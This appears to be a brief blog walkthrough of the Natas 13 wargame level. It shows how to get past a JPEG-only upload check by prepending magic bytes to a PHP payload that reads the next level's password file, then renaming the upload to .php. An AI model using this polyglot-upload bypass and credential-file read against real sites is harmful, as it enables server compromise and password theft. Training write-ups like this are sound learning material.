people learn from their mistakes, so does Natas. They have heard that instead of .jpg we were able to upload any file, so they just made some changes and “improved” their security for this level. have they even heard about magic numbers? today they are gonna do their magic for us.
first just open your terminal and hexdump any .jpg file. I have just found this cutie in my laptop, so gonna see how .jpg files differ from the other ones. so, I'm gonna type: xxd -C nameofthephoto.jpg
echo file_get_contents( "/etc/natas_webpass/natas14 ");
and now let's make a .jpg file just to have the magic numbers in it:
echo -e "\xff\xd8\xff\xe0\n" > newfile.jpg
we should merge these two files:
cat natas13.php >> newfile.jpg
the rest is the same. upload the file, change the name into .php (now you like burp suite more, right?) and enjoy the moment. come back for the next level.
I thought it's supposed to be easier…
Post a Comment